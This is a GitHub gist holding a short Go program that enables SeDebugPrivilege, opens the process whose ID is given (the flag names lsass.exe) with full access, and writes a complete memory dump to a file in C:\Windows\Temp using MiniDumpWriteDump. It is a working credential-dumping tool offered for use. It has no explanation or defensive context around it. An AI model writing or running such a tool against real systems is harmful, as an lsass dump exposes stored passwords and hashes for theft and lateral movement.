Created
July 9, 2021 11:16
-
-
Save pwn1sher/9002adac9eb40a1bc6a8af8cdddeef19 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
import ( | |
"flag" | |
"fmt" | |
"golang.org/x/sys/windows" | |
"log" | |
"syscall" | |
) | |
const ( | |
PROCESS_CREATE_PROCESS = 0x0080 | |
PROCESS_CREATE_THREAD = 0x0002 | |
PROCESS_DUP_HANDLE = 0x0040 | |
PROCESS_QUERY_INFORMATION = 0x0400 | |
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000 | |
PROCESS_SET_INFORMATION = 0x0200 | |
PROCESS_SET_QUOTA = 0x0100 | |
PROCESS_SUSPEND_RESUME = 0x0800 | |
PROCESS_TERMINATE = 0x0001 | |
PROCESS_VM_OPERATION = 0x0008 | |
PROCESS_VM_READ = 0x0010 | |
PROCESS_VM_WRITE = 0x0020 | |
GENERIC_WRITE = 0x40000000 | |
FILE_SHARE_WRITE = 0x00000002 | |
CREATE_ALWAYS = 0x2 | |
FILE_ATTRIBUTE_NORMAL = 0x80 | |
DEBUG_WITH_FULL_MEMORY = 0x00000002 | |
PROCESS_ALL_ACCESS = (PROCESS_CREATE_PROCESS | PROCESS_CREATE_THREAD | PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION | PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_SET_INFORMATION | PROCESS_SET_QUOTA | PROCESS_SUSPEND_RESUME | PROCESS_TERMINATE | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ) | |
) | |
func EnablePrivilege(name string) error { | |
// get current process token | |
handle := windows.CurrentProcess() | |
var token windows.Token | |
err := windows.OpenProcessToken(handle, windows.TOKEN_ADJUST_PRIVILEGES|windows.TOKEN_QUERY, &token) | |
if err != nil { | |
fmt.Println("Failed to obtain current process token\n") | |
} | |
// lookup debug privilege | |
debug := new(windows.LUID) | |
err = windows.LookupPrivilegeValue(nil, windows.StringToUTF16Ptr(name), debug) | |
if err != nil { | |
fmt.Println("Failed to lookup \"%s\"\n", name) | |
} | |
// adjust token privilege | |
privilege := windows.Tokenprivileges{ | |
PrivilegeCount: 1, | |
Privileges: [1]windows.LUIDAndAttributes{{ | |
Luid: *debug, | |
Attributes: windows.SE_PRIVILEGE_ENABLED, | |
}}, | |
} | |
err = windows.AdjustTokenPrivileges(token, false, &privilege, 0, nil, nil) | |
if err != nil { | |
fmt.Println("Failed to enable %s with current process token\n", name) | |
} | |
return nil | |
} | |
func main() { | |
// Enable Debug Privs ! | |
EnablePrivilege("SeDebugPrivilege") | |
pid := flag.Int("pid", 0, "Process ID of lsass.exe") | |
flag.Parse() | |
dbghelp := windows.NewLazySystemDLL("Dbghelp.dll") | |
MiniDumpWriteDump := dbghelp.NewProc("MiniDumpWriteDump") | |
var sa windows.SecurityAttributes | |
//get handle to process | |
pHandle, errOpenProcess := windows.OpenProcess(PROCESS_ALL_ACCESS, false, uint32(*pid)) | |
if errOpenProcess != nil { | |
log.Fatal(fmt.Sprintf("[!] Error calling OpenProcess: %s\n", errOpenProcess.Error())) | |
} | |
fmt.Println(fmt.Sprintf("[-] Successfully got a handle to process %d", *pid)) | |
//create dump file | |
path := "C:\\Windows\\Temp\\dump.dmp" | |
fHandle, errCreateFile := windows.CreateFile(syscall.StringToUTF16Ptr(path), GENERIC_WRITE, FILE_SHARE_WRITE, &sa, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0) | |
if errCreateFile != nil { | |
log.Fatal(fmt.Sprintf("[!] Error calling CreateFile\n")) | |
} | |
fmt.Println(fmt.Sprintf("[-] Successfully got a handle to file %d", fHandle)) | |
PID := uintptr(*pid) | |
//dump memory with minidumpwritedump | |
success, _, _ := MiniDumpWriteDump.Call(uintptr(pHandle), PID, uintptr(fHandle), DEBUG_WITH_FULL_MEMORY, 0, 0, 0) | |
//if errMiniDump != nil { | |
if success == 0 { | |
log.Fatal(fmt.Sprintf("[!] Error calling MiniDumpWriteDump:\n")) | |
} | |
fmt.Println(fmt.Sprintf("[-] Dump Completed: %s", path)) | |
//close handle to process | |
windows.CloseHandle(pHandle) | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment